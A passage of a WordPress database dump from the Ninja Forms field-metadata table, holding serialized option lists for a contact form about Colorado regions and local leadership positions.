Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8755,200,'field_label','First Name','field_label','First Name'),(8756,200,'field_key','textbox_154','field_key','textbox_154'),(8757,200,'custom_name_attribute','','custom_name_attribute',''),(8758,200,'personally_identifiable','','personally_identifiable',''),(8759,200,'value','','value',''),(8760,201,'field_label','Last Name','field_label','Last Name'),(8761,201,'field_key','lastname_155','field_key','lastname_155'),(5533,192,'key','listselect_73','key','listselect_73'),(5534,192,'container_class','','container_class',''),(5535,192,'parent_id','18','parent_id','18'),(5536,193,'objectType','Field','objectType','Field'),(5537,193,'objectDomain','fields','objectDomain','fields'),(5538,193,'editActive','','editActive',''),(5539,193,'order','7','order','7'),(5540,193,'type','hr','type','hr'),(5541,193,'label','hr','label','hr'),(5542,193,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5543,193,'show_desc','0','show_desc','0'),(5544,193,'desc_pos','none','desc_pos','none'),(5545,193,'desc_text','','desc_text',''),(5546,193,'element_class','','element_class',''),(5547,193,'key','hr_74','key','hr_74'),(5548,193,'container_class','','container_class',''),(5549,193,'parent_id','18','parent_id','18'),(5550,194,'objectType','Field','objectType','Field'),(5551,194,'objectDomain','fields','objectDomain','fields'),(5552,194,'editActive','','editActive',''),(5553,194,'order','8','order','8'),(5554,194,'type','html','type','html'),(5555,194,'label','Northwest Leadership Positions','label','Northwest Leadership Positions'),(5556,194,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5557,194,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Leadership Positions</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Northwest Leadership Positions</span></span></span></strong></span></h3>'),(5558,194,'desc_el','div','desc_el','div'),(5559,194,'show_desc','0','show_desc','0'),(5560,194,'desc_pos','none','desc_pos','none'),(5561,194,'desc_text','','desc_text',''),(5562,194,'element_class','','element_class','');
INSERT INTO `wpcl_nf3_field_meta` VALUES (5563,194,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Mountain Area Leadership Positions</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Mountain Area Leadership Positions</span></span></span></strong></span></h3>'),(5564,194,'key','html_75','key','html_75'),(5565,194,'container_class','','container_class',''),(5566,194,'parent_id','18','parent_id','18'),(5567,195,'objectType','Field','objectType','Field'),(5568,195,'objectDomain','fields','objectDomain','fields'),(5569,195,'editActive','','editActive',''),(5570,195,'order','9','order','9'),(5571,195,'type','listselect','type','listselect'),(5572,195,'label','Select the person you would like to email','label','Select the person you would like to email'),(5573,195,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5574,195,'label_pos','above','label_pos','above'),(5575,195,'list_type','dropdown','list_type','dropdown'),(5576,195,'multi_size','5','multi_size','5'),(5577,195,'list_show_value','1','list_show_value','1'),(5578,195,'list','a:0:{}','list','a:0:{}'),(5579,195,'user_info_field_group','','user_info_field_group',''),(5580,195,'calc_auto_include','0','calc_auto_include','0'),(5581,195,'user_state','0','user_state','0'),(5582,195,'num_sort','0','num_sort','0'),(5583,195,'admin_label','','admin_label',''),(5584,195,'show_help','0','show_help','0'),(5585,195,'help_text','','help_text',''),(5586,195,'show_desc','0','show_desc','0'),(5587,195,'desc_pos','none','desc_pos','none'),(5588,195,'desc_text','','desc_text',''),(5589,195,'element_class','','element_class',''),(5590,195,'required','1','required','1'),(5591,195,'options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:2:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 